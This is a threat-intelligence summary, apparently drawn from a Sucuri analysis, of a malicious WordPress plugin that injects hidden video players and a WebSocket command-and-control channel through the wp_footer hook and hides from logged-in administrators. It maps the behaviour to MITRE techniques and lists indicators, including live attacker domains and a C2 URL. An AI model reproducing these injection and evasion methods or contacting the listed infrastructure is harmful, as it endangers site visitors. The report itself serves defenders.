A malicious WordPress plugin named wordpress-player.php has been found redirecting visitors from at least 26 infected websites to suspicious sites via hidden video players and WebSocket connections to attacker-controlled servers. The malware exploits the wpfooter hook to inject code, evade detection, and enables real-time commands for redirection and video playback control. #wordpress-player.php #wpfooter #WebSocketC2
Keypoints
- The wordpress-player.php plugin masquerades as a legitimate WordPress core component to evade administrator detection.
- It uses the wp_footer action hook to inject invisible HTML5 video elements and JavaScript into website footers.
- The injected video plays silently from a suspicious domain (videocdnnetworkalls.monster) to generate fraudulent impressions or support malicious functionality.
- A persistent WebSocket connection to a C2 server (wss://steamycomfort.fun/ws/player) enables attackers to issue live commands, including user redirections and video control.
- The malware avoids execution for logged-in users to remain hidden from site administrators and editors.
- Infection has been identified on at least 26 websites, often spreading through pirated or compromised WordPress installations.
- Mitigation involves thorough malware removal, password resets, two-factor authentication, software updates, and Web Application Firewall deployment.
MITRE Techniques
- [T1505] Server Software Component – The plugin is dropped directly into wp-content/plugins/ to execute malicious code. (‘The plugin was dropped directly into the wp-content/plugins/ directory’)
- [T1059] Command and Scripting Interpreter – JavaScript executes in the page footer to create hidden video elements and establish WebSocket connections. (‘The plugin leverages the wp_footer action hook to inject its JavaScript and HTML components’)
- [T1573] Encrypted Channel – Uses WebSocket over wss:// protocol to communicate with the remote C2 server for live command and control. (‘This WebSocket acts like a command and control (C2) channel. It allows the attacker to…’)
- [T1071] Application Layer Protocol – WebSocket protocol used as a communication channel for attacker instructions and tracking users. (‘The malware listens for messages from the WebSocket server and reacts accordingly’)
- [T1087] Account Discovery – The malware excludes logged-in users (site admins/editors) from its malicious actions to avoid detection. (‘The malware avoids execution for logged-in users’)
Indicators of Compromise
- [File Name] Malicious plugin file – wordpress-player.php located in wp-content/plugins/
- [Domain] Suspicious video hosting and C2 infrastructure – videocdnnetworkalls.monster, steamycomfort.fun
- [URL] Video source URL – hxxps://videocdnnetworkalls[.]monster/
- [WebSocket URL] Command and control server – wss://steamycomfort.fun/ws/player
Read more: https://blog.sucuri.net/2025/06/analysis-of-a-malicious-wordpress-plugin-the-covert-redirector.html